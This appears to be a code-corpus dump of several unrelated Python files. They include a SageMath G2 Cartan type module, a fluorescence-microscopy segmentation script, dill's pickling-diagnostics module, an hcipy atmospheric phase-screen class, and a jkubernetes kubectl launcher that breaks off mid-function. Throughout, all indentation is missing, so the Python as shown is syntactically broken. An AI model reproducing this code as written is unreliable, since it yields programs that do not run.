sage: latex(CartanType(['G',2]))
G_2
sage: latex(CartanType(['G',2]).dual())
G_2 \text{ relabelled by } \left\{1 : 2, 2 : 1\right\}
"""
return "G_2"
AmbientSpace = AmbientSpace
def coxeter_number(self):
"""
Return the Coxeter number associated with ``self``.
EXAMPLES::
sage: CartanType(['G',2]).coxeter_number()
6
"""
return 6
def dual_coxeter_number(self):
"""
Return the dual Coxeter number associated with ``self``.
EXAMPLES::
sage: CartanType(['G',2]).dual_coxeter_number()
4
"""
return 4
def dynkin_diagram(self):
"""
Returns a Dynkin diagram for type G.
EXAMPLES::
sage: g = CartanType(['G',2]).dynkin_diagram()
sage: g
3
O=<=O
1 2
G2
sage: sorted(g.edges())
[(1, 2, 1), (2, 1, 3)]
"""
from .dynkin_diagram import DynkinDiagram_class
g = DynkinDiagram_class(self)
g.add_edge(1,2)
g.set_edge_label(2,1,3)
return g
def _latex_dynkin_diagram(self, label=lambda i: i, node=None, node_dist=2, dual=False):
r"""
Return a latex representation of the Dynkin diagram.
EXAMPLES::
sage: print(CartanType(['G',2])._latex_dynkin_diagram())
\draw (0,0) -- (2 cm,0);
\draw (0, 0.15 cm) -- +(2 cm,0);
\draw (0, -0.15 cm) -- +(2 cm,0);
\draw[shift={(0.8, 0)}, rotate=180] (135 : 0.45cm) -- (0,0) -- (-135 : 0.45cm);
\draw[fill=white] (0 cm, 0 cm) circle (.25cm) node[below=4pt]{$1$};
\draw[fill=white] (2 cm, 0 cm) circle (.25cm) node[below=4pt]{$2$};
<BLANKLINE>
"""
if node is None:
node = self._latex_draw_node
ret = "\\draw (0,0) -- (%s cm,0);\n"%node_dist
ret += "\\draw (0, 0.15 cm) -- +(%s cm,0);\n"%node_dist
ret += "\\draw (0, -0.15 cm) -- +(%s cm,0);\n"%node_dist
if dual:
ret += self._latex_draw_arrow_tip(0.5*node_dist+0.2, 0, 0)
else:
ret += self._latex_draw_arrow_tip(0.5*node_dist-0.2, 0, 180)
ret += node(0, 0, label(1))
ret += node(node_dist, 0, label(2))
return ret
def ascii_art(self, label=lambda i: i, node=None):
"""
Return an ascii art representation of the Dynkin diagram.
EXAMPLES::
sage: print(CartanType(['G',2]).ascii_art(label=lambda x: x+2))
3
O=<=O
3 4
"""
if node is None:
node = self._ascii_art_node
ret = " 3\n{}=<={}\n".format(node(label(1)), node(label(2)))
return ret + "{!s:4}{!s:4}".format(label(1), label(2))
def dual(self):
r"""
Return the dual Cartan type.
This uses that `G_2` is self-dual up to relabelling.
EXAMPLES::
sage: G2 = CartanType(['G',2])
sage: G2.dual()
['G', 2] relabelled by {1: 2, 2: 1}
sage: G2.dynkin_diagram()
3
O=<=O
1 2
G2
sage: G2.dual().dynkin_diagram()
3
O=<=O
2 1
G2 relabelled by {1: 2, 2: 1}
"""
return self.relabel({1:2, 2:1})
def _default_folded_cartan_type(self):
"""
Return the default folded Cartan type.
EXAMPLES::
sage: CartanType(['G', 2])._default_folded_cartan_type()
['G', 2] as a folding of ['D', 4]
"""
from sage.combinat.root_system.type_folded import CartanTypeFolded
return CartanTypeFolded(self, ['D', 4], [[1, 3, 4], [2]])
# For unpickling backward compatibility (Sage <= 4.1)
from sage.structure.sage_object import register_unpickle_override
register_unpickle_override('sage.combinat.root_system.type_G', 'ambient_space', AmbientSpace)
|
py | 1a305d494478a6d7d10a37d8e5ef279e975879cb | import os
import glob
# Our numerical workhorses
import numpy as np
import pandas as pd
import scipy.special
# Import the project utils
import sys
sys.path.insert(0, '../')
import image_analysis_utils as im_utils
# Useful plotting libraries
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib as mpl
import seaborn as sns
# Image analysis libraries
import skimage.io
import skimage.filters
import skimage.segmentation
import scipy.ndimage
# Set plotting style
im_utils.set_plotting_style()
#==============================================================================
# METADATA
#==============================================================================
DATE = 20161118
USERNAME = 'mrazomej'
OPERATOR = 'O2'
BINDING_ENERGY = -13.9
REPRESSORS = (0, 0, 130)
IPDIST = 0.160 # in units of µm per pixel
STRAINS = ['auto', 'delta', 'RBS1027']
IPTG_RANGE = (0, 0.1, 5, 10, 25, 50, 75, 100, 250, 500, 1000, 5000)
#==============================================================================
# Define the data directory.
data_dir = '../../../data/microscopy/' + str(DATE) + '/'
# Glob the profile and noise images.
yfp_glob = glob.glob(data_dir + '*yfp_profile*/*.tif')
rfp_glob = glob.glob(data_dir + '*mCherry_profile*/*.tif')
noise_glob = glob.glob(data_dir + '*noise*/*.tif')
# Load the images as collections
yfp_profile = skimage.io.ImageCollection(yfp_glob)
rfp_profile = skimage.io.ImageCollection(rfp_glob)
noise_profile = skimage.io.ImageCollection(noise_glob)
# Need to split the noise profile image into the two channels
noise_rfp = [noise_profile[i][0] for i, _ in enumerate(noise_profile)]
noise_yfp = [noise_profile[i][1] for i, _ in enumerate(noise_profile)]
# Generate averages and plot them.
rfp_avg = im_utils.average_stack(rfp_profile)
yfp_avg = im_utils.average_stack(yfp_profile)
rfp_noise = im_utils.average_stack(noise_rfp)
yfp_noise = im_utils.average_stack(noise_yfp)
with sns.axes_style('white'):
fig, ax = plt.subplots(2, 2, figsize=(6,6))
ax = ax.ravel()
ax[0].imshow(yfp_avg, cmap=plt.cm.viridis)
ax[0].set_title('yfp profile')
ax[1].imshow(rfp_avg, cmap=plt.cm.plasma)
ax[1].set_title('rfp profile')
ax[2].imshow(yfp_noise, cmap=plt.cm.Greens_r)
ax[2].set_title('yfp noise')
ax[3].imshow(rfp_noise, cmap=plt.cm.Reds_r)
ax[3].set_title('rfp noise')
plt.tight_layout()
plt.savefig('./outdir/background_correction.png')
#==============================================================================
# Iterate through each strain and concentration to make the dataframes.
dfs = []
# Select random IPTG and random strain to print the example segmentation
ex_iptg = np.random.choice(IPTG_RANGE)
ex_strain = STRAINS[-1]
for i, st in enumerate(STRAINS):
print(st)
for j, iptg in enumerate(IPTG_RANGE):
# Load the images
if (iptg==0) & (st != STRAINS[-1]):
images = glob.glob(data_dir + '*' + st + '_*/*.tif')
else:
images = glob.glob(data_dir + '*' + st + '*_' + str(iptg) +
'uMIPTG*/*.ome.tif')
if len(images) is not 0:
ims = skimage.io.ImageCollection(images)
# Select random image to print example segmentation
ex_no = np.random.choice(np.arange(0, len(images) - 1))
for z, x in enumerate(ims):
_, m, y = im_utils.ome_split(x)
y_flat = im_utils.generate_flatfield(y, yfp_noise, yfp_avg)
# Segment the mCherry channel.
m_seg = im_utils.log_segmentation(m, label=True)
# Print example segmentation for the random image
if (st==ex_strain) & (iptg == ex_iptg) & (z == ex_no):
merge = im_utils.example_segmentation(m_seg, _, 10/IPDIST)
skimage.io.imsave('./outdir/example_segmentation.png', merge)
# Extract the measurements.
im_df = im_utils.props_to_df(m_seg, physical_distance=IPDIST,
intensity_image=y_flat)
# Add strain and IPTG concentration information.
im_df.insert(0, 'IPTG_uM', iptg)
im_df.insert(0, 'repressors', REPRESSORS[i])
im_df.insert(0, 'rbs', st)
im_df.insert(0, 'binding_energy', BINDING_ENERGY)
im_df.insert(0, 'operator', OPERATOR)
im_df.insert(0, 'username', USERNAME)
im_df.insert(0, 'date', DATE)
# Append the dataframe to the global list.
dfs.append(im_df)
# Concatenate the dataframe
df_im = pd.concat(dfs, axis=0)
df_im.to_csv('./outdir/' + str(DATE) + '_' + OPERATOR + '_' +\
STRAINS[-1] + '_raw_segmentation.csv', index=False)
|
py | 1a305d589fd99a0bec3c4029563e5f8162b0535a | #!/usr/bin/env python
#
# Author: Mike McKerns (mmckerns @caltech and @uqfoundation)
# Copyright (c) 2008-2016 California Institute of Technology.
# Copyright (c) 2016-2019 The Uncertainty Quantification Foundation.
# License: 3-clause BSD. The full license text is available at:
# - https://github.com/uqfoundation/dill/blob/master/LICENSE
"""
Methods for detecting objects leading to pickling failures.
"""
import dis
from inspect import ismethod, isfunction, istraceback, isframe, iscode
from .pointers import parent, reference, at, parents, children
from ._dill import _trace as trace
from ._dill import PY3
__all__ = ['baditems','badobjects','badtypes','code','errors','freevars',
'getmodule','globalvars','nestedcode','nestedglobals','outermost',
'referredglobals','referrednested','trace','varnames']
def getmodule(object, _filename=None, force=False):
"""get the module of the object"""
from inspect import getmodule as getmod
module = getmod(object, _filename)
if module or not force: return module
if PY3: builtins = 'builtins'
else: builtins = '__builtin__'
builtins = __import__(builtins)
from .source import getname
name = getname(object, force=True)
return builtins if name in vars(builtins).keys() else None
def outermost(func): # is analogous to getsource(func,enclosing=True)
"""get outermost enclosing object (i.e. the outer function in a closure)
NOTE: this is the object-equivalent of getsource(func, enclosing=True)
"""
if PY3:
if ismethod(func):
_globals = func.__func__.__globals__ or {}
elif isfunction(func):
_globals = func.__globals__ or {}
else:
return #XXX: or raise? no matches
_globals = _globals.items()
else:
if ismethod(func):
_globals = func.im_func.func_globals or {}
elif isfunction(func):
_globals = func.func_globals or {}
else:
return #XXX: or raise? no matches
_globals = _globals.iteritems()
# get the enclosing source
from .source import getsourcelines
try: lines,lnum = getsourcelines(func, enclosing=True)
except: #TypeError, IOError
lines,lnum = [],None
code = ''.join(lines)
# get all possible names,objects that are named in the enclosing source
_locals = ((name,obj) for (name,obj) in _globals if name in code)
# now only save the objects that generate the enclosing block
for name,obj in _locals: #XXX: don't really need 'name'
try:
if getsourcelines(obj) == (lines,lnum): return obj
except: #TypeError, IOError
pass
return #XXX: or raise? no matches
def nestedcode(func, recurse=True): #XXX: or return dict of {co_name: co} ?
"""get the code objects for any nested functions (e.g. in a closure)"""
func = code(func)
if not iscode(func): return [] #XXX: or raise? no matches
nested = set()
for co in func.co_consts:
if co is None: continue
co = code(co)
if co:
nested.add(co)
if recurse: nested |= set(nestedcode(co, recurse=True))
return list(nested)
def code(func):
'''get the code object for the given function or method
NOTE: use dill.source.getsource(CODEOBJ) to get the source code
'''
if PY3:
im_func = '__func__'
func_code = '__code__'
else:
im_func = 'im_func'
func_code = 'func_code'
if ismethod(func): func = getattr(func, im_func)
if isfunction(func): func = getattr(func, func_code)
if istraceback(func): func = func.tb_frame
if isframe(func): func = func.f_code
if iscode(func): return func
return
#XXX: ugly: parse dis.dis for name after "<code object" in line and in globals?
def referrednested(func, recurse=True): #XXX: return dict of {__name__: obj} ?
"""get functions defined inside of func (e.g. inner functions in a closure)
NOTE: results may differ if the function has been executed or not.
If len(nestedcode(func)) > len(referrednested(func)), try calling func().
If possible, python builds code objects, but delays building functions
until func() is called.
"""
if PY3:
att1 = '__code__'
att0 = '__func__'
else:
att1 = 'func_code' # functions
att0 = 'im_func' # methods
import gc
funcs = set()
# get the code objects, and try to track down by referrence
for co in nestedcode(func, recurse):
# look for function objects that refer to the code object
for obj in gc.get_referrers(co):
# get methods
_ = getattr(obj, att0, None) # ismethod
if getattr(_, att1, None) is co: funcs.add(obj)
# get functions
elif getattr(obj, att1, None) is co: funcs.add(obj)
# get frame objects
elif getattr(obj, 'f_code', None) is co: funcs.add(obj)
# get code objects
elif hasattr(obj, 'co_code') and obj is co: funcs.add(obj)
# frameobjs => func.func_code.co_varnames not in func.func_code.co_cellvars
# funcobjs => func.func_code.co_cellvars not in func.func_code.co_varnames
# frameobjs are not found, however funcobjs are...
# (see: test_mixins.quad ... and test_mixins.wtf)
# after execution, code objects get compiled, and then may be found by gc
return list(funcs)
def freevars(func):
"""get objects defined in enclosing code that are referred to by func
returns a dict of {name:object}"""
if PY3:
im_func = '__func__'
func_code = '__code__'
func_closure = '__closure__'
else:
im_func = 'im_func'
func_code = 'func_code'
func_closure = 'func_closure'
if ismethod(func): func = getattr(func, im_func)
if isfunction(func):
closures = getattr(func, func_closure) or ()
func = getattr(func, func_code).co_freevars # get freevars
else:
return {}
return dict((name,c.cell_contents) for (name,c) in zip(func,closures))
# thanks to Davies Liu for recursion of globals
def nestedglobals(func, recurse=True):
"""get the names of any globals found within func"""
func = code(func)
if func is None: return list()
from .temp import capture
names = set()
with capture('stdout') as out:
dis.dis(func) #XXX: dis.dis(None) disassembles last traceback
for line in out.getvalue().splitlines():
if '_GLOBAL' in line:
name = line.split('(')[-1].split(')')[0]
names.add(name)
for co in getattr(func, 'co_consts', tuple()):
if co and recurse and iscode(co):
names.update(nestedglobals(co, recurse=True))
return list(names)
def referredglobals(func, recurse=True, builtin=False):
"""get the names of objects in the global scope referred to by func"""
return globalvars(func, recurse, builtin).keys()
def globalvars(func, recurse=True, builtin=False):
"""get objects defined in global scope that are referred to by func
return a dict of {name:object}"""
if PY3:
im_func = '__func__'
func_code = '__code__'
func_globals = '__globals__'
func_closure = '__closure__'
else:
im_func = 'im_func'
func_code = 'func_code'
func_globals = 'func_globals'
func_closure = 'func_closure'
if ismethod(func): func = getattr(func, im_func)
if isfunction(func):
globs = vars(getmodule(sum)).copy() if builtin else {}
# get references from within closure
orig_func, func = func, set()
for obj in getattr(orig_func, func_closure) or {}:
_vars = globalvars(obj.cell_contents, recurse, builtin) or {}
func.update(_vars) #XXX: (above) be wary of infinte recursion?
globs.update(_vars)
# get globals
globs.update(getattr(orig_func, func_globals) or {})
# get names of references
if not recurse:
func.update(getattr(orig_func, func_code).co_names)
else:
func.update(nestedglobals(getattr(orig_func, func_code)))
# find globals for all entries of func
for key in func.copy(): #XXX: unnecessary...?
nested_func = globs.get(key)
if nested_func is orig_func:
#func.remove(key) if key in func else None
continue #XXX: globalvars(func, False)?
func.update(globalvars(nested_func, True, builtin))
elif iscode(func):
globs = vars(getmodule(sum)).copy() if builtin else {}
#globs.update(globals())
if not recurse:
func = func.co_names # get names
else:
orig_func = func.co_name # to stop infinite recursion
func = set(nestedglobals(func))
# find globals for all entries of func
for key in func.copy(): #XXX: unnecessary...?
if key is orig_func:
#func.remove(key) if key in func else None
continue #XXX: globalvars(func, False)?
nested_func = globs.get(key)
func.update(globalvars(nested_func, True, builtin))
else:
return {}
#NOTE: if name not in func_globals, then we skip it...
return dict((name,globs[name]) for name in func if name in globs)
def varnames(func):
"""get names of variables defined by func
returns a tuple (local vars, local vars referrenced by nested functions)"""
func = code(func)
if not iscode(func):
return () #XXX: better ((),())? or None?
return func.co_varnames, func.co_cellvars
def baditems(obj, exact=False, safe=False): #XXX: obj=globals() ?
"""get items in object that fail to pickle"""
if not hasattr(obj,'__iter__'): # is not iterable
return [j for j in (badobjects(obj,0,exact,safe),) if j is not None]
obj = obj.values() if getattr(obj,'values',None) else obj
_obj = [] # can't use a set, as items may be unhashable
[_obj.append(badobjects(i,0,exact,safe)) for i in obj if i not in _obj]
return [j for j in _obj if j is not None]
def badobjects(obj, depth=0, exact=False, safe=False):
"""get objects that fail to pickle"""
from dill import pickles
if not depth:
if pickles(obj,exact,safe): return None
return obj
return dict(((attr, badobjects(getattr(obj,attr),depth-1,exact,safe)) \
for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))
def badtypes(obj, depth=0, exact=False, safe=False):
"""get types for objects that fail to pickle"""
from dill import pickles
if not depth:
if pickles(obj,exact,safe): return None
return type(obj)
return dict(((attr, badtypes(getattr(obj,attr),depth-1,exact,safe)) \
for attr in dir(obj) if not pickles(getattr(obj,attr),exact,safe)))
def errors(obj, depth=0, exact=False, safe=False):
"""get errors for objects that fail to pickle"""
from dill import pickles, copy
if not depth:
try:
pik = copy(obj)
if exact:
assert pik == obj, \
"Unpickling produces %s instead of %s" % (pik,obj)
assert type(pik) == type(obj), \
"Unpickling produces %s instead of %s" % (type(pik),type(obj))
return None
except Exception:
import sys
return sys.exc_info()[1]
_dict = {}
for attr in dir(obj):
try:
_attr = getattr(obj,attr)
except Exception:
import sys
_dict[attr] = sys.exc_info()[1]
continue
if not pickles(_attr,exact,safe):
_dict[attr] = errors(_attr,depth-1,exact,safe)
return _dict
# EOF
|
py | 1a305deddb86a2c4ba2982c43b54d1ee77b798ba | from __future__ import division
from .atmospheric_model import AtmosphericLayer, phase_covariance_von_karman, fried_parameter_from_Cn_squared
from ..statistics import SpectralNoiseFactoryMultiscale
from ..field import Field, RegularCoords, UnstructuredCoords, CartesianGrid
from .finite_atmospheric_layer import FiniteAtmosphericLayer
import numpy as np
from scipy import linalg
from scipy.ndimage import affine_transform
import time
import warnings
class InfiniteAtmosphericLayer(AtmosphericLayer):
def __init__(self, input_grid, Cn_squared=None, L0=np.inf, velocity=0, height=0, stencil_length=2, use_interpolation=False):
self._initialized = False
AtmosphericLayer.__init__(self, input_grid, Cn_squared, L0, velocity, height)
# Check properties of input_grid
if not input_grid.is_('cartesian'):
raise ValueError('Input grid must be cartesian.')
if not input_grid.is_regular:
raise ValueError('Input grid must be regularly spaced')
if not input_grid.ndim == 2:
raise ValueError('Input grid must be two-dimensional.')
self.stencil_length = stencil_length
self.use_interpolation = use_interpolation
self._make_stencils()
self._make_covariance_matrices()
self._make_AB_matrices()
self._make_initial_phase_screen()
self.center = np.zeros(2)
self._initialized = True
def _recalculate_matrices(self):
if self._initialized:
self._make_covariance_matrices()
self._make_AB_matrices()
def _make_stencils(self):
# Vertical
self.new_grid_bottom = CartesianGrid(RegularCoords(self.input_grid.delta, [self.input_grid.dims[0], 1], self.input_grid.zero - np.array([0, self.input_grid.delta[1]])))
self.stencil_bottom = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped
self.stencil_bottom[:self.stencil_length,:] = True
for i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[0])):
self.stencil_bottom[(n + self.stencil_length - 1) % self.input_grid.dims[1],i] = True
self.stencil_bottom = self.stencil_bottom.ravel()
self.num_stencils_vertical = np.sum(self.stencil_bottom)
# Horizontal
self.new_grid_left = CartesianGrid(RegularCoords(self.input_grid.delta, [1, self.input_grid.dims[1]], self.input_grid.zero - np.array([self.input_grid.delta[0], 0])))
self.stencil_left = Field(np.zeros(self.input_grid.size, dtype='bool'), self.input_grid).shaped
self.stencil_left[:,:self.stencil_length] = True
for i, n in enumerate(np.random.geometric(0.5, self.input_grid.dims[1])):
self.stencil_left[i,(n + self.stencil_length - 1) % self.input_grid.dims[0]] = True
self.stencil_left = self.stencil_left.ravel()
self.num_stencils_horizontal = np.sum(self.stencil_left)
def _make_covariance_matrices(self):
phase_covariance = phase_covariance_von_karman(fried_parameter_from_Cn_squared(1, 1), self.L0)
# Vertical
x = np.concatenate((self.input_grid.x[self.stencil_bottom], self.new_grid_bottom.x))
x = np.concatenate([x - xx for xx in x])
y = np.concatenate((self.input_grid.y[self.stencil_bottom], self.new_grid_bottom.y))
y = np.concatenate([y - yy for yy in y])
separations = CartesianGrid(UnstructuredCoords((x, y)))
n = self.new_grid_bottom.size + self.num_stencils_vertical
self.cov_matrix_vertical = phase_covariance(separations).reshape((n, n))
# Horizontal
x = np.concatenate((self.input_grid.x[self.stencil_left], self.new_grid_left.x))
x = np.concatenate([x - xx for xx in x])
y = np.concatenate((self.input_grid.y[self.stencil_left], self.new_grid_left.y))
y = np.concatenate([y - yy for yy in y])
separations = CartesianGrid(UnstructuredCoords((x, y)))
n = self.new_grid_left.size + self.num_stencils_horizontal
self.cov_matrix_horizontal = phase_covariance(separations).reshape((n, n))
def _make_AB_matrices(self):
# Vertical
n = self.num_stencils_vertical
cov_zz = self.cov_matrix_vertical[:n,:n]
cov_xz = self.cov_matrix_vertical[n:, :n]
cov_zx = self.cov_matrix_vertical[:n, n:]
cov_xx = self.cov_matrix_vertical[n:, n:]
cf = linalg.cho_factor(cov_zz)
inv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))
self.A_vertical = cov_xz.dot(inv_cov_zz)
BBt = cov_xx - self.A_vertical.dot(cov_zx)
U, S, Vt = np.linalg.svd(BBt)
L = np.sqrt(S[:self.input_grid.dims[0]])
self.B_vertical = U * L
# Horizontal
n = self.num_stencils_horizontal
cov_zz = self.cov_matrix_horizontal[:n,:n]
cov_xz = self.cov_matrix_horizontal[n:, :n]
cov_zx = self.cov_matrix_horizontal[:n, n:]
cov_xx = self.cov_matrix_horizontal[n:, n:]
cf = linalg.cho_factor(cov_zz)
inv_cov_zz = linalg.cho_solve(cf, np.eye(cov_zz.shape[0]))
self.A_horizontal = cov_xz.dot(inv_cov_zz)
BBt = cov_xx - self.A_horizontal.dot(cov_zx)
U, S, Vt = np.linalg.svd(BBt)
L = np.sqrt(S[:self.input_grid.dims[1]])
self.B_horizontal = U * L
def _make_initial_phase_screen(self):
oversampling = 16
layer = FiniteAtmosphericLayer(self.input_grid, self.Cn_squared, self.outer_scale, self.velocity, self.height, oversampling)
self._achromatic_screen = layer.phase_for(1)
self._shifted_achromatic_screen = self._achromatic_screen
def _extrude(self, where=None):
flipped = (where == 'top') or (where == 'right')
horizontal = (where == 'left') or (where == 'right')
if where == 'top' or where == 'right':
screen = self._achromatic_screen[::-1]
else:
screen = self._achromatic_screen
if horizontal:
stencil = self.stencil_left
A = self.A_horizontal
B = self.B_horizontal
else:
stencil = self.stencil_bottom
A = self.A_vertical
B = self.B_vertical
stencil_data = screen[stencil]
random_data = np.random.normal(0, 1, size=B.shape[1])
new_slice = A.dot(stencil_data) + B.dot(random_data) * np.sqrt(self._Cn_squared)
screen = screen.shaped
if horizontal:
screen = np.hstack((new_slice[:,np.newaxis], screen[:,:-1]))
else:
screen = np.vstack((new_slice[np.newaxis,:], screen[:-1,:]))
screen = Field(screen, self.input_grid)
if flipped:
self._achromatic_screen = screen[::-1,::-1].ravel()
else:
self._achromatic_screen = screen.ravel()
def phase_for(self, wavelength):
return self._shifted_achromatic_screen / wavelength
def reset(self):
self._make_initial_phase_screen()
self.center = np.zeros(2)
self._t = 0
def evolve_until(self, t):
if t is None:
self.reset()
return
old_center = np.round(self.center / self.input_grid.delta).astype('int')
self.center = self.velocity * t
new_center = np.round(self.center / self.input_grid.delta).astype('int')
delta = new_center - old_center
for i in range(abs(delta[0])):
if delta[0] < 0:
self._extrude('left')
else:
self._extrude('right')
for i in range(abs(delta[1])):
if delta[1] < 0:
self._extrude('bottom')
else:
self._extrude('top')
if self.use_interpolation:
# Use bilinear interpolation to interpolate the achromatic phase screen to the correct position.
# This is to avoid sudden shifts by discrete pixels.
ps = self._achromatic_screen.shaped
sub_delta = self.center - new_center * self.input_grid.delta
with warnings.catch_warnings():
warnings.filterwarnings('ignore', message='The behaviour of affine_transform with a one-dimensional array supplied for the matrix parameter has changed in scipy 0.18.0.')
self._shifted_achromatic_screen = affine_transform(ps, np.array([1,1]), (sub_delta / self.input_grid.delta)[::-1], mode='nearest', order=1).ravel()
else:
self._shifted_achromatic_screen = self._achromatic_screen
@property
def Cn_squared(self):
return self._Cn_squared
@Cn_squared.setter
def Cn_squared(self, Cn_squared):
self._Cn_squared = Cn_squared
@property
def outer_scale(self):
return self._L0
@outer_scale.setter
def L0(self, L0):
self._L0 = L0
self._recalculate_matrices() |
py | 1a305f2fba69629b890dad5bc0f21b54b8cebba3 | #!/bin/env python
import os
import sys
import random
import subprocess as sub
import getopt
import time
def identity(x):
return x
def cygpath(x):
command = ["cygpath", "-wp", x]
p = sub.Popen(command,stdout=sub.PIPE)
output, errors = p.communicate()
lines = output.split("\n")
return lines[0]
if sys.platform == "cygwin":
normclasspath = cygpath
else:
normclasspath = identity
CUSTOM_CONF_FILE = ""
CONFIG_OPTS = []
STATUS = 0
JKUBERNETES_DIR = "/".join(os.path.realpath( __file__ ).split("/")[:-2])
JKUBERNETES_CONF_DIR = os.getenv("JKUBERNETES_CONF_DIR", JKUBERNETES_DIR + "/conf" )
CONFIG_OPTS = []
EXCLUDE_JARS = []
INCLUDE_JARS = []
API_SERVER_ADDRESS = ""
JKUBERNETES_CREATE_YAML_PATH = ""
def check_java():
check_java_cmd = 'which java'
ret = os.system(check_java_cmd)
if ret != 0:
print("Failed to find java, please add java to PATH")
sys.exit(-1)
def print_commands():
"""Print all client commands and link to documentation"""
print ("kubectl command [-s http://apiserverip:port]")
print ("Commands:\n\t", "\n\t".join(sorted(COMMANDS.keys())))
print ("\nHelp:", "\n\thelp", "\n\thelp <command>")
print ("\nDocumentation for the jkubernetes client can be found at https://github.com/gwisoft/jkubernetes/wiki/jkubernetes-Chinese-Documentation\n")
def get_jars_full(adir):
ret = []
temp = adir.strip()
print (temp == "")
if temp == "":
return ret
files = os.listdir(adir)
for f in files:
if f.endswith(".jar") == False:
continue
filter = False
for exclude_jar in EXCLUDE_JARS:
if f.find(exclude_jar) >= 0:
filter = True
break
if filter == True:
print ("Don't add " + f + " to classpath")
else:
ret.append(adir + "/" + f)
return ret
def unknown_command(*args):
print ("Unknown command: [kubectl %s]" % ' '.join(sys.argv[1:]))
print_usage()
def print_usage(command=None):
"""Print one help message or list of available commands"""
if command != None:
if command in COMMANDS:
print (COMMANDS[command].__doc__ or
"No documentation provided for <%s>" % command)
else:
print ("<%s> is not a valid command" % command)
else:
print_commands()
def parse_config_opts_and_args(args):
curr = args[:]
curr.reverse()
config_list = []
args_list = []
while len(curr) > 0:
token = curr.pop()
if token == "-s":
global API_SERVER_ADDRESS
API_SERVER_ADDRESS = curr.pop()
elif token == "-c":
config_list.append(curr.pop())
elif token == "--config":
global CUSTOM_CONF_FILE
CUSTOM_CONF_FILE = curr.pop()
else:
args_list.append(token)
print ("config_list=")
print (config_list)
print ("args_list=")
print (args_list)
return config_list, args_list
def parse_config_opts(config_list):
global CONFIG_OPTS
if len(config_list) > 0:
for config in config_list:
CONFIG_OPTS.append(config)
def filter_array(array):
ret = []
for item in array:
temp = item.strip()
if temp != "":
ret.append(temp)
return ret
def get_config_opts():
global CONFIG_OPTS
print ("-Dkubernetes.options=" + (','.join(CONFIG_OPTS)).replace(' ', "%%%%"))
return "-Dkubernetes.options=" + (','.join(CONFIG_OPTS)).replace(' ', "%%%%")
#扩展的jar包入参
def get_exclude_jars():
global EXCLUDE_JARS
return " -Dexclude.jars=" + (','.join(EXCLUDE_JARS))
def create(args):
"""
kubectl create -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlCreate",
jvmtype="-client -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def kube(args):
"""
kubectl kube
"""
pass
childopts = get_client_customopts() + get_exclude_jars()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.daemon.kube.KubeServer",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="true")
def kubelet(args):
"""
kubectl kubelet
"""
pass
childopts = get_client_customopts() + get_exclude_jars()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.daemon.kubelet.Kubelet",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="true")
def delete(args):
"""
kubectl delete -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlDelete",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def rollingUpdate(args):
"""
kubectl rolling-update [old topology name] -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlRollingUpdate",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def replace(args):
"""
kubectl replace -f ***.yaml
"""
pass
args = parse_client_createopts(args)
childopts = get_client_customopts() + get_exclude_jars() + get_client_createopts()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlReplace",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def get(args):
"""
kubectl get po [topology name]
"""
pass
childopts = get_client_customopts() + get_exclude_jars()
print ("childopts=")
print (childopts)
exec_jkubernetes_class(
"org.gwisoft.jkubernetes.kubectl.KubectlGet",
jvmtype="-server -Xms256m -Xmx256m",
sysdirs=[JKUBERNETES_CONF_DIR, JKUBERNETES_DIR + "/bin",CUSTOM_CONF_FILE],
args=args,
childopts=childopts,
isBackgroundRun="false")
def get_client_createopts():
ret = (" -Dkubernetes.create.yaml=" + JKUBERNETES_CREATE_YAML_PATH + " -Dkubernetes.apiserver.address=" + API_SERVER_ADDRESS)
return ret
def parse_client_createopts(args):
print ("parse_client_createopts=")
print (args)
curr = args
curr.reverse()
args_list = []
while len(curr) > 0:
token = curr.pop()
print (token == "-f")
if token == "-f":
global JKUBERNETES_CREATE_YAML_PATH
JKUBERNETES_CREATE_YAML_PATH = curr.pop()
else:
args_list.append(token)
print (args_list)
return args_list
def exec_jkubernetes_class(klass, jvmtype="-server", sysdirs=[], args=[], childopts="",isBackgroundRun=""):
args_str = " ".join(args)
command = "java " + " -Dkubernetes.home=" + JKUBERNETES_DIR + " " + get_config_opts() + " " + childopts + " -cp " + get_classpath(sysdirs) + " " + klass + " " + args_str
print ("Running: " + command)
global STATUS
